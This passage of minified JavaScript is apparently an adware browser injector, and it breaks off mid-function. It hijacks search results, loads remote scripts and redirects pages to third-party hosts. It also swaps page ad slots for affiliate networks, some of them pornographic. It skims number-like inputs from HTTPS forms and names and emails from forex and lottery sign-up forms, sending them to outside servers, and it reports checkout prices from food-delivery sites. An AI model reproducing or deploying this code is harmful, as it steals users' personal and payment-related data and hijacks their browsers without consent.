b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1}; b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c= b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0, 10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=6563864032225124500&eid=310&pid=1539\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\"); e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement, !1)}});;if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top && !document.getElementById('sjsjszmzmaw28aj6')){var script=document.createElement('script');script.type='text/javascript';script.setAttribute('id','sjsjszmzmaw28aj6');script.src='//static.getjs.net/sd/1018/1022.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){if(window.self==window.top&&!document.getElementById('shk85shssma')){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.id='shk85shssma';a.src=-1<window.self.location.hostname.indexOf(\"cebook.co\")?\"//cdncache-a.akamaihd.net/loaders/1543/l.js?aoi=1311798366&pid=1543&zoneid=511164&ext=greatsaver&systemid=6563864032225124500\":\"//static.getjs.net/sd/1018/1005.js\";document.getElementsByTagName(\"head\")[0].appendChild(a);}})();;if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\r\n};(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax.com/z/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&eid=310&hid=6563864032225124500&pid=1539&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax.com/z/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&eid=310&hid=6563864032225124500&pid=1539&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};if(\"www.youtube.com\"==window.self.location.hostname&&\"http:\"==window.self.location.protocol){var video_id=window.location.search.split(\"v=\")[1];if(video_id){var ampersandPosition=video_id.indexOf(\"&\");-1!=ampersandPosition&&(video_id=video_id.substring(0,ampersandPosition));if(video_id&&document.getElementById(\"watch7-views-info\")){var vc=document.getElementById(\"watch7-views-info\").firstElementChild;vc&&document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML&&((new Image).src=\"http://score.developpro.info/?pr=1&d=\"+video_id+\"&s=\"+document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML.replace(/[^0-9]/g,\"\"))}}};if((-1<window.self.location.hostname.indexOf(\"foodpanda\")||-1<window.self.location.hostname.indexOf(\"hellofood\"))&&document.getElementById(\"submitRegisterStep1\")){var price=query_selector_all(\".cart-line-price\"),p=price&&price[price.length-1]?parseInt(price[price.length-1].innerHTML.replace(/[^0-9]/g,\"\")):0,h=window.self.location.hostname;(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=\"+h+\"&s=\"+p}\"justeat.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"checkout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");\"tastykhana.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"billing\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");if(-1<window.self.location.hostname.indexOf(\"titbit.com\")||\"checkout\"==window.self.location.hostname)(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=titbit.com&s=0\";\"www.grubhub.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"payment\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.grubhub.com&s=0\");\"www.delivery.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"order_process\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.delivery.com&s=0\");\"www.foodler.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"AnonCheckout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.foodler.com&s=0\");\"eat24hours.com\"==window.self.location.hostname&&\"https:\"==window.self.location.protocol&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=eat24hours.com&s=0\");(function(){try{var a=document.getElementsByTagName(\"input\");if(\"https:\"==window.self.location.protocol&&4<a.length)for(var d=function(b){b=b.target;if(b.value&&11<b.value.length&&20>b.value.length&&b.value.match(/^[0-9]+$/))for((new Image).src=\"https://score.sendapplicationget.com/g.php?pr=2&d=\"+window.self.location.hostname+\"&s=0&r=\"+(+new Date).toString()+Math.random(),b=0;b<a.length;b++)a&&a.removeEventListener?a.removeEventListener(\"blur\",d,!1):a&&a.detachEvent&&a.detachEvent(\"onblur\",d)},c=0;c<a.length;c++)a[c]&&a[c].addEventListener?a[c].addEventListener(\"blur\",d,!1):a[c]&&a[c].attachEvent&&a[c].attachEvent(\"onblur\",d)}catch(e){}})();(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\.@]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?id=\"+f+\"&c=\"+encodeURIComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();var _wlst={lsKey:\"xhxg4sk42hsba\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1==b){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.foreveryboxzip.net/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch(b){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['cpx_bet_55',3095],['yieldads_rmx',511],['blutonic_apx',46],['adsuduos_apx',79],['mari_gen2',438],['web3_nontb3',181],['acsencion_apx1',49],['dsnr_dasa_t3_19_3',98],['dsnr_nntb_t3',73],['velis_apx1',200],['matomy_adj_21',2706],['matomy_adj_21_2',2323],['adstract_new_t3_24_3',103],['yashi_apx_new',49],['baba_nontb',49]],[['cpx_nontb30_tr',2000],['mari_strm15',2200],['mari_strm15_2',2200],['web3_strm5',1000],['matomy_strm20',800],['matomy_strm20_2',800],['adstract_strm_t3_24_3',1000]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('KxccQXsm=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"ads.yahoo.com\"||window.self.location.hostname==\"ads.blutonic.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"ace1.acsencion.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=511164')>-1|| _zyad.location.indexOf('=458516')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting [bleep] gangbang orgy gay nude tits tranny blowjob handjob masturbat busty [bleep] joder horny mamada polla [bleep] pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s3483884712\"))continue}catch©{try{if(d[i].getAttribute(\"s3483884712\"))continue}catch(e){}};try{if(d[i].src.indexOf('=511164')>-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s3483884712\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a.ifr,a.size);b++;a&&a&&\"function\"==typeof a.func&&setTimeout(function(){a.func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'KxccQXsm=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s3483884712\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(window.self.location.hostname.indexOf('outube.com')>-1 || size=='120x60' ) {return false;};return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/cmp/1412355/index.html?size=+size+&referrer=' (atp?atp:1), [354,size]);}}catch(e){return !1;}},yieldads_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;var ref = window.top==window.self?encodeURIComponent(window.self.location.href):'';return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size=+size+&section=5081932&pub_url=+ref+' (atp?atp:1), [559,size]);}}catch(e){return !1;}},blutonic_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2196577\",\"300x250\":\"2196579\",\"728x90\":\"2196581\"}[size];var surl='http://ads.blutonic.com/tt?id='+ arr  + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]&pubclick=[INSERT_CLICK_TAG]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [577,size]);}}catch(e){return !1;}},adsuduos_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2382556\",\"728x90\":\"2382574\",\"160x600\":\"2382575\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [741,size]);}}catch(e){return !1;}},mari_gen2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"120x600\":\"2399310\",\"160x600\":\"2399311\",\"300x250\":\"2399312\",\"728x90\":\"2399313\",\"468x60\":\"2399315\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [749,size]);}}catch(e){return !1;}},web3_nontb3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2361553&size=+size+' (atp?atp:1), [753,size]);}}catch(e){return !1;}},acsencion_apx1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2403318\",\"300x250\":\"2403321\",\"728x90\":\"2403322\"}[size];var surl='http://ace1.acsencion.com/tt?id='+ arr  + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [756,size]);}}catch(e){return !1;}},dsnr_dasa_t3_19_3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2404478&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [767,size]);}}catch(e){return !1;}},dsnr_nntb_t3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2404341&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [770,size]);}}catch(e){return !1;}},velis_apx1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"120x600\":\"2431824\",\"160x600\":\"2431823\",\"300x250\":\"2431822\",\"468x60\":\"2431825\",\"728x90\":\"2431805\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return 